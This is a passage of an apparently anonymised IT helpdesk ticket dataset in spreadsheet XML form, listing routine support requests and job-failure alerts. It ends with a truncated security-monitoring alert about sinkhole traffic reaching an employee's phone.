    <s v="erp-passwort 3mal verkehrt eingegeben - bitte erp-account freischalten."/>
    <s v="tqrylspg ijzghqwy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="add the rtpcnyhq ceqmwkhi to  materials_management / purchasing"/>
    <s v="_x000a__x000a_received from: inxsupmy.zhwmifvx@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please add rtpcnyhq ceqmwkhi to the materials_management/purchasing group in ticketing_tool ._x000a__x000a_inxsupmy zhwmifvx_x000a_team lead - ssl (sourcing &amp; logistics) - global it_x000a_inxsupmy.zhwmifvx@gmail.com_x000a_"/>
    <s v="inxsupmy zhwmifvx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwhrertran failed in job_scheduler at: 09/23/2016 00:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrertran failed in job_scheduler at: 09/23/2016 00:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="india coating: interface: vlan1  on company-ap-ind-india-coating-dmvpn-891-rtr01 is down since 9/22/2016 11:12 pm et."/>
    <s v="india coating: interface: vlan1  on company-ap-ind-india-coating-dmvpn-891-rtr01 is down since 9/22/2016 11:12 pm et."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="engineering tool log in problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwsyaqpr.bzasnmvw@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i have changed the password of engineering tool 2days back. it showed that it is successfully changed._x000d__x000a_still i am not able to login._x000d__x000a__x000d__x000a_please check the error message in the below image._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35577.c8358d50]_x000d__x000a__x000d__x000a_"/>
    <s v="pchjidaq pvtxjaml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool problem"/>
    <s v="hello_x000d__x000a_i can not add a new customer while making a new engineering_tool._x000d__x000a_i entered the country and the city._x000d__x000a_there used to be a button new, but not anymore._x000d__x000a__x000d__x000a_"/>
    <s v="cuytdmhv yeqdmwvt"/>
    <x v="25"/>
  </r>
  <r>
    <s v="apac, apac: temprature sensor#1, yellow - on   company-ap-chn-apac-3750-access-sw02 on 9/22/2016 at 9:50 pm et."/>
    <s v="sw#1, temperature sensor#1, yellow - on   company-ap-chn-apac-3750-access-sw02_x000d__x000a_ hardware component: warning or critical state detected"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="vip 2 - outlook not working - receiving a message that it is not a licensed product"/>
    <s v="outlook not working - receiving a message that it is not a licensed product"/>
    <s v="qdilorms feayhdmu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="urgent - new customer account"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aunpdmlj.kzhapcve@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_unable to proceed with opening a new customer account #81053922._x000d__x000a__x000d__x000a_please advise as what the issue is?_x000d__x000a__x000d__x000a_[cid:image003.jpg@01SID_35583.6ed99ce0]_x000d__x000a__x000d__x000a_"/>
    <s v="aunpdmlj kzhapcve"/>
    <x v="14"/>
  </r>
  <r>
    <s v="sign in password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fpedscxo.acuvyqnx@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a__x000d__x000a_i was recently advised that my password needed changing._x000d__x000a_i went to the password manager site and changed passwords._x000d__x000a__x000d__x000a_all passwords for different things changed except one, my startup to log onto computer failed to change how do i change this one._x000d__x000a__x000d__x000a_"/>
    <s v="fpedscxo acuvyqnx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="boot up issue with the laptop."/>
    <s v="boot up issue with the laptop._x000a_-user requesting local it to check  the laptop as the pc is not booting up at all._x000a_-user tried to plug in the power adaptor .still no go._x000a_-service tag: 7658r32_x000a_-asset tag: 405268_x000a_-ph: _x000a_ "/>
    <s v="koiapqbg teyldpkw"/>
    <x v="2"/>
  </r>
  <r>
    <s v=":my computer keeps going off line"/>
    <s v="name:sndaofyw jetcxpda_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vichtyuky.warhtyonack@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:my computer keeps going off line"/>
    <s v="sndaofyw jetcxpda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_555 failed in job_scheduler at: 09/22/2016 18:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_555 failed in job_scheduler at: 09/22/2016 18:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_46filesys failed in job_scheduler at: 09/22/2016 18:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_46filesys failed in job_scheduler at: 09/22/2016 18:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="user not recieving email on the iphone."/>
    <s v="user not recieving email on the iphone._x000d__x000a_-checked the user account .all fine._x000d__x000a_-checked the user accont on the ecp site.all fine._x000d__x000a_-advised the user to contact vendor._x000d__x000a__x000d__x000a_"/>
    <s v="bfmlysrk olbthfqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: skype login issue."/>
    <s v="name:rgtyob lafgseimer_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:pjcompanyfeg.wnrcyaks@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:reset password today now skype will not take password"/>
    <s v="pjkmtfeg wnrcyaks"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_47filesys failed in job_scheduler at: 09/22/2016 17:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_47filesys failed in job_scheduler at: 09/22/2016 17:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="software installation"/>
    <s v="name:uprmwlgb kirvecja_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uprmwlgb.kirvecja@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:software installation"/>
    <s v="uprmwlgb kirvecja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print erp jobs from prtqv7282 after routing it from prtqv0001 "/>
    <s v="unable to print erp jobs from prtqv7282 after routing it from prtqv0001 "/>
    <s v="xpoqcrtb zwrypjqv"/>
    <x v="44"/>
  </r>
  <r>
    <s v="change printer from prtqv0001 to prtqv7282"/>
    <s v="change printer from prtqv0001 to prtqv7282"/>
    <s v="xpoqcrtb zwrypjqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for vmdwslkj.exvcknbp@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: thursday, september 22, 2016 7:57 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: amar - request to reset microsoft online services password for vmdwslkj.exvcknbp@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ vmdwslkj.exvcknbp@gmail.com _x000a_â€¢ first name: angyta hgywselena _x000a_â€¢ last name: brescsfgryiani acgyuna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vmdwslkj exvcknbp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bill hartwell can't access drawings on \\HostName_1330\departments\engineering\process sheets cadkey dwgs"/>
    <s v="please assign bill the necessary permissions so that he can open the drawings (see attachment)"/>
    <s v="zqrnveyx hajtfmcd"/>
    <x v="11"/>
  </r>
  <r>
    <s v="quoting engine"/>
    <s v="_x000a__x000a_received from: iauqlrjk.nijdaukz@gmail.com_x000a__x000a_hello,_x000a__x000a_i have 2 previous tickets for an issue that i am experiencing again today.  i am not sure why i keep having this issue, can someone help me understand if it is something i am doing wrong?  this is something i use daily and need access to._x000a_inc1547050 â€“ 9/05/16_x000a_inc1542047 â€“ 8/18/16_x000a__x000a__x000a_description: when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'_x000a__x000a_"/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="13"/>
  </r>
  <r>
    <s v="product selector not working"/>
    <s v="please investigate the issue with the product selector. currently no data is being loaded on the company website."/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="no display on the external monitor connected through docking station"/>
    <s v="no display on the external monitor connected through docking station_x000d__x000a__x000d__x000a_i request you to kindly look into a video display issue on my computer where i do not get display on the external monitor when docked to the docking station. i have tried on other docking stations and have not been able to get the display on the external monitor. i've had this issue for over three months and it was intermittent earlier. _x000d__x000a_i had discussed this with ghkkytu and he is aware of this issue as we have worked on it together._x000d__x000a_we have reinstalled video drivers but issue still persists. i will leave the computer with security _x000d__x000a_request assistance on the same._x000d__x000a_"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0442920"/>
    <s v="ticket update on ticket_no0442920"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print from printer // install driver"/>
    <s v="unable to print from printer // install driver"/>
    <s v="idlupnzr nkxylwrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mscrm: outlook not opening."/>
    <s v="mscrm: outlook not opening._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-reconfigured the user profile ._x000d__x000a_-launched outlook._x000d__x000a_-caller confirmed that he is now able to see the emails on outlook._x000d__x000a_-issue resolved."/>
    <s v="gbwviklo ukwijqtm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook on my pc won't open.  "/>
    <s v="stays on the open screen and won't complete.  been like this for 2 days.  _x000a__x000a__x000a__x000a_(in an off-site meeting so may not be able to answer phone for a while)"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access windows account"/>
    <s v="unable to access windows account"/>
    <s v="quxtnlgd tqnjyzsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="auf den totmannhandys ist eine stÃ¶rung."/>
    <s v="auf den totmannhandys ist eine stÃ¶rung._x000d__x000a_&quot; techn. stÃ¶rung dps-request fehlt ! &quot;"/>
    <s v="tfrbwoua aegpkruc"/>
    <x v="41"/>
  </r>
  <r>
    <s v="urgent help required- crm mobile app "/>
    <s v="loading crm mobile app times out and returns to phone desktop before completing download"/>
    <s v="jvshydix rzpmnylt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user haveing issues with the skype audio."/>
    <s v="user haveing issues with the skype audio._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-checked the audio settings ._x000d__x000a_-gave a uacyltoe hxgaycze call to the user.all fine._x000d__x000a_-issue resolved."/>
    <s v="ibsywxpc icxhsbfv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 09/22/2016 14:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 09/22/2016 14:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="collaboration_platform permission help"/>
    <s v="i made a mistake and change the permissions do basically everything on the following page.  i wanted to see if there was a way to restore all permissions to what they were yesterday?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="zhvrtnom waedkqzj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="user wanted help to check if a email was spam."/>
    <s v="user wanted help to check if a email was spam._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-assigned the ticket to the spam._x000d__x000a_-educated the user on the same._x000d__x000a_-issue resolved."/>
    <s v="ibsywxpc icxhsbfv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype problem!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ztdgvclp.gzcalstq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am having a problem with skype. i am not able to find my colleagues!!!_x000d__x000a_[cid:image001.png@01SID_354d3.4a1aefe0]_x000d__x000a__x000d__x000a_"/>
    <s v="ztdgvclp gzcalstq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie cleanup"/>
    <s v="ie cleanup"/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access bex analyzer "/>
    <s v="unable to access bex analyzer as nothing happens when click _x000a__x000a_pc name: lmdl8516210_x000a__x000a_phone: "/>
    <s v="jfgkmauh wfrgkejq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp login information misplaced"/>
    <s v="password reset needed"/>
    <s v="puxyqwjn zgmnsvjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update inplant_862994"/>
    <s v="ticket update inplant_862994"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook asking to reactivate "/>
    <s v="outlook asking to reactivate "/>
    <s v="tfrpybxj qodbpvwj"/>
    <x v="27"/>
  </r>
  <r>
    <s v="unable to print from the printer hp color laser cp4005 pcl6-cl33"/>
    <s v="unable to print from the printer hp color laser cp4005 pcl6-cl33_x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-the printer keeps asking to update drivers._x000d__x000a_-tried to install the drivers . no go_x000d__x000a_-contact : -8093_x000d__x000a_-computer name : lhql8516312_x000d__x000a_-user wants to have local it look as there are many users faceing similar issue."/>
    <s v="edanpfzl qyrfndkp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="usb port issue"/>
    <s v="usb ports not works at time"/>
    <s v="qubywmgf jouickqx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ie upgrade"/>
    <s v="upgraded the ie to 11 on uacyltoe hxgaycze workstation."/>
    <s v="gzhapcld fdigznbk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="user wants to change the erp printer prt1: prtqv0001 to prt2:prtqz7282"/>
    <s v="user wants to change the erp printer prt1: prtqv0001 to prt2:prtqz7282"/>
    <s v="omiwzbue auvolfhp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="pyrtfdxu nxfkqmoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v=":i am trying to find an expense report to approve. i have an email that says i have one to approve. it is not showing up"/>
    <s v="name:bonhyb knepkhsw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xziwkgeo.gdiraveu@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am trying to find an expense report to approve. i have an email that says i have one to approve. it is not showing up."/>
    <s v="xziwkgeo gdiraveu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm app installation"/>
    <s v="crm app installation"/>
    <s v="itslpwra vybdkuoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot connect to \\HostName_779\engineering_application going through company vpn. i can access HostName_770, HostName_768 and HostName_776."/>
    <s v="cannot connect to \\HostName_779\engineering_application going through company vpn. i can access HostName_770, HostName_768 and HostName_776 servers through the vpn. i can access HostName_779 at the office. i can not access remotely through vpn.company.com."/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to install crm app on galaxy s3 "/>
    <s v="user has a samsung galaxy s3 device with android 4.3 as the os on it. he wants to install and use the dynamics crm app but that app requires android 4.4 as a minimum. "/>
    <s v="tuzkadxv rxloutpn"/>
    <x v="63"/>
  </r>
  <r>
    <s v="ticket update on inplant_861679"/>
    <s v="ticket update on inplant_861679"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp vc - configair application in SID_1 uacyltoe hxgaycze environment not working - 500 internal server error"/>
    <s v="configair server in uacyltoe hxgaycze environment SID_1 responds with 500 internal server error: Â Â error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist' _x000d__x000a_this happens when i log on erp with language &quot;de&quot; german. it is happening for both models csscdrill and mill_model._x000d__x000a_in case i log on erp in en language the csscdrill model is working fine. but the mill_model model comes up and when i select a product platform the system hangs up at 90%."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_986:  application &quot;plm scheduled tasks monitor&quot; on node &quot;HostName_986&quot; is in a critical state "/>
    <s v="HostName_986:  application &quot;plm scheduled tasks monitor&quot; on node &quot;HostName_986&quot; is in a critical state "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="qgzfklpu dqumyvlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool issue"/>
    <s v="EU_tool is having issue since we i upgraded to 64 bit.  keeps saying out of memory_x000a__x000a_phone: "/>
    <s v="ulmctsvi lbvrdika"/>
    <x v="25"/>
  </r>
  <r>
    <s v="need to upgrade ie 11"/>
    <s v="could you please confirm if this upgrade occurred?  i was out of town during the week of the upgrade and was never prompted for anything, so i suspect that this didn't happen.  if so, i'll need to schedule an upgrade for this computer please."/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sometimes ship to address is changed from the system "/>
    <s v="examples _x000d__x000a_5616762610_x000d__x000a_4505623480_x000d__x000a_5616737367_x000d__x000a_4505646259_x000d__x000a_problem as discussed in key user call from 09/21"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1394 failed in job_scheduler at: 09/22/2016 10:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1394 failed in job_scheduler at: 09/22/2016 10:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="engineering_tool issue  high importance"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xkegcqov.drctxjqi@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_354be.f00aff40]_x000d__x000a__x000d__x000a__x000d__x000a_i submitted several reports a couple of days ago and now it will not let me create a new report?_x000d__x000a_need this issue resplved._x000d__x000a_"/>
    <s v="xkegcqov drctxjqi"/>
    <x v="25"/>
  </r>
  <r>
    <s v="ticket update on inplant_862933"/>
    <s v="ticket update on inplant_862933"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to user's collaboration_platform"/>
    <s v="need access to user's collaboration_platform_x000d__x000a__x000d__x000a__x000d__x000a_summary:cowqyjzm fzsxgapt has informed me that stefyty smhdyhtis collaboration_platform for business will be permanently deleted in 7 days.  i need access to his collaboration_platform to see if there is any information on their that we need.  "/>
    <s v="xmeytziq dcgwuvfk"/>
    <x v="15"/>
  </r>
  <r>
    <s v="erp pur - wrong subcontracting demand for mm 3784477"/>
    <s v="hello,_x000d__x000a_material 4895588 shows 2 pieces demand in plant_283 for  parent mm 7236071 which refers to subcontracting po 5616525187._x000d__x000a_the po has been closed already. the component had been shipped to the vendor with a 541 movement and has been booked out with the 543 movement together with the 101 movement for the good receipt. _x000d__x000a_why shows erp still a demand of 2 pieces for that po?_x000d__x000a_how can this &quot;wrong&quot; demand been cleaned?_x000d__x000a_"/>
    <s v="tckyrinp vbzqslco"/>
    <x v="29"/>
  </r>
  <r>
    <s v="cannot access collaboration_platform"/>
    <s v="i can't access my collaboration_platform.  it asks me my username and password and then goes into a constant loop of those two fields.  once entered, i never actually get to collaboration_platform.  "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vitalyst // unable to see customer list in crm"/>
    <s v="vitalyst // unable to see customer list in crm. see attached screenshot_x000a__x000a_user id - lehhywsmat_x000a_contact no - "/>
    <s v="oxkhntpl xwszgidt"/>
    <x v="22"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rbozivdq gmlhrtvp_x000a_ hi jonnht_x000a_bnoupaki cpeioxdz_x000a_ hello_x000a_rbozivdq gmlhrtvp_x000a_ it's not showing as locked_x000a_ can you tell me what's the error you're getting?_x000a_bnoupaki cpeioxdz_x000a_ now i can log in.  not sure why i was temporarily unable to do so.  all seems to be ok.   "/>
    <s v="bnoupaki cpeioxdz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp netweaver error"/>
    <s v="_x000a__x000a_received from: unrbafjx.reyshakw@gmail.com_x000a__x000a_hello,_x000a__x000a_i have this error when starting erp netweaver, can you please help to solve ?_x000a__x000a_[cid:image001.png@01SID_354ed.42570791]_x000a__x000a__x000a_[cid:image002.png@01SID_354ed.42570791]_x000a__x000a_unrbafjx reyshakw_x000a_global portfolio manager_x000a_advanced materials / pcd_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="unrbafjx reyshakw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset - erp SID_34"/>
    <s v="reset the erp SID_34 password as marcel had issues logging in after resetting his password using password_management_tool."/>
    <s v="yszectoh kqwljchg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to home printer "/>
    <s v="unable to connect to home printer "/>
    <s v="ztrpuvdf jlahkmdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="fcpnodsr nbrdxscg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="PR"/>
    <s v="create a purchase requisition with purchasing does not work any more. i got following error massage :_x000d__x000a__x000d__x000a_action could not be performed _x000d__x000a_no data found for employee 00000etc inform system administrator "/>
    <s v="ejvkzobl yijgokrn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="security incidents - ( #in33944691 ) : possible malware infection - traffic from sinkhole domain to tims-iphone"/>
    <s v="source ip: 195.272.28.222_x000a_source port: 80_x000a_source ip geolocation: lisbon, prt_x000a_destination ip: 10.201.40.86_x000a_destination hostname: tims-iphone_x000a_system name :not found_x000a_user  name:not found_x000a_location :usa_x000a_sep , sms status :not found_x000a_field sales user ( yes / no) :  no_x000a_dsw event log:see below_x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 416678855_x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000a_occurrence count: 4_x000a_event count: 2_x000a__x000a_host and connection information_x000a_source ip: 195.272.28.222_x000a_source port: 80_x000a_source ip geolocation: lisbon, prt_x000a_destination ip: 10.201.40.86_x000a_destination hostname: tims-iphone_x000a_destination port: 50867_x000a_destination mac address: 4c:7c:5f:36:97:8d_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a_http status code: 302_x000a__x000a_device information_x000a_device ip: 10.32.100.17_x000a_device name: isensor03.company.com_x000a_log time: 2016-09-22 at 10:40:17 utc_x000a_action: not blocked_x000a_vendor eventid: 727755_x000a_cvss score: -1 _x000a_vendor priority: 2_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 699417_x000a_inspector event id: 072629004_x000a_ontology id: 200020003203755736_x000a_event type id: 200020003203582148_x000a_agent id: 102805_x000a__x000a_event detail:_x000a_[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000a_[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602982][event id: 727755][time: 2585651928.978762]_x000a_[src ip: 195.22.28.222][dst ip: 10.20.40.86][sport/itype: 80][dport/icode: 50867][proto: 6]_x000a_09/22/2016-10:40:17.978762 195.22.28.222:80 -&gt; 10.20.40.86:50867_x000a_tcp ttl:55 tos:0x0 id:35970 iplen:20 dgmlen:390 df_x000a_***ap*** seq: 0x67a1bbf6 ack: 0x8043a3dc win: 0x35 tcplen: 32_x000a_tcp options (3) =&gt; nop nop ts: 4914239511 340005971 _x000a_==pcap 1==_x000a__x000a_[o:security]_x000a__x000a_[correlation_data]_x000a_sep 22 06:32:17 27.38.93.278 dhcpd[27069]: dhcpack on 10.20.40.86 to 4c:7c:5f:36:97:8d (tims-iphone) via eth1 relay 62.61.65.018 lease-duration 432000 (renew)_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_.......wj...........e.....@.7.........(v.p..g....c.....5au........&quot;p.n..http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.22.sep.2016.10:40:18.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=c3613dd3017c909140052247b5cfac27;.domain=.myslidz.com..location:._x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 11b5 e357 4aef 0e00 8601 0000 .......wj......._x000a_000010 8601 0000 4500 0186 8c82 4000 3706 a391 ....e.....@.7..._x000a_000020 c316 1cde 0a14 2856 0050 c6b3 67a1 bbf6 ......(v.p..g..._x000a_000030 8043 a3dc 8018 0035 6155 0000 0101 080a .c.....5au......_x000a_000040 e2af 2250 0e4e 07ec 4854 5450 2f31 2e31 ..&quot;p.n..http/1.1_x000a_000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo_x000a_000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:._x000a_000070 6e67 696e 780d 0a44 6174 653a 2054 6875 nginx..date:.thu_x000a_000080 2c20 3232 2053 6570 2032 3031 3620 3130 ,.22.sep.2016.10_x000a_000090 3a34 303a 3138 2047 4d54 0d0a 436f 6e74 :40:18.gmt..cont_x000a_0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h_x000a_0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:_x000a_0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook_x000a_0000d0 6965 3a20 616e 6274 723d 6333 3631 3364 ie:.anbtr=c3613d_x000a_0000e0 6433 3031 3763 3738 3739 3238 3833 3031 d3017c9091400522_x000a_0000f0 3437 6235 6366 6163 3237 3b20 646f 6SID_26 47b5cfac27;.doma_x000a_000100 696e 3d2e 6d79 736c 6964 7a2e 636f 6d0d in=.myslidz.com._x000a_000110 0a4c 6f63 6174 696f 6e3a 2068 7474 703a .location:.http:_x000a_000120 2f2f 7873 736f 2e61 7069 2e6d 7973 6c69 //xsso.api.mysli_x000a_000130 647a 2e63 6f6d 2f63 3336 3133 6464 3330 dz.com/c3613dd30_x000a_000140 3137 6337 3837 3932 3838 3330 3134 3762 17c909140052247b_x000a_000150 3563 6661 6332 370d 0a0d 0a47 6f20 6874 5cfac27....go.ht_x000a_000160 7470 3a2f 2f78 7373 6f2e 6170 692e 6d79 tp://xsso.api.my_x000a_000170 736c 6964 7a2e 636f 6d2f 6333 3631 3364 slidz.com/c3613d_x000a_000180 6433 3031 3763 3738 3739 3238 3833 3031 d3017c9091400522_x000a_000190 3437 6235 6366 6163 3237 47b5cfac27_x000a_==pcap 1 hex e==_x000a__x000a_event id: 416678840_x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000a_occurrence count: 4_x000a_event count: 2_x000a__x000a_host and connection information_x000a_source ip: 195.22.26.248_x000a_source hostname: 248.192/26.26.22.195.in-addr.arpa._x000a_anubisnetworks.com._x000a_source port: 80_x000a_source ip geolocation: lisbon, prt_x000a_destination ip: 10.20.40.86_x000a_destination hostname: tims-iphone_x000a_destination port: 50867_x000a_destination mac address: 4c:7c:5f:36:97:8d_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a_http status code: 302_x000a__x000a_device information_x000a_device ip: 10.32.100.17_x000a_device name: isensor03.company.com_x000a_log time: 2016-09-22 at 10:40:17 utc_x000a_action: not blocked_x000a_vendor eventid: 727755_x000a_cvss score: -1 _x000a_vendor priority: 2_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 699417_x000a_inspector event id: 072629004_x000a_ontology id: 200020003203755736_x000a_event type id: 200020003203582148_x000a_agent id: 102805_x000a__x000a_event detail:_x000a_[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000a_[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602982][event id: 597040][time: 2585651929.453577]_x000a_[src ip: 195.22.26.248][dst ip: 10.20.40.86][sport/itype: 80][dport/icode: 50873][proto: 6]_x000a_09/22/2016-10:40:18.453577 195.22.26.248:80 -&gt; 10.20.40.86:50873_x000a_tcp ttl:55 tos:0x0 id:48955 iplen:20 dgmlen:284 df_x000a_***ap*** seq: 0x4abba086 ack: 0xf5079dce win: 0x35 tcplen: 32_x000a_tcp options (3) =&gt; nop nop ts: 4914239629 340006418 _x000a_==pcap 1==_x000a__x000a_[o:security]_x000a__x000a_[correlation_data]_x000a_sep 22 06:32:17 27.38.93.278 dhcpd[27069]: dhcpack on 10.20.40.86 to 4c:7c:5f:36:97:8d (tims-iphone) via eth1 relay 62.61.65.018 lease-duration 432000 (renew)_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_.......w............e....;@.7.s(......(v.p..j..........5r.........&quot;..n..http/1.1.200.ok..server:.nginx..date:.thu,.22.sep.2016.10:40:18.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=c3613dd3017c909140052247b5cfac27;.domain=.myslidz.com..content-encoding:.gzip........................_x000a_==pcap 1 ascii e==_x000a__x000a_hex 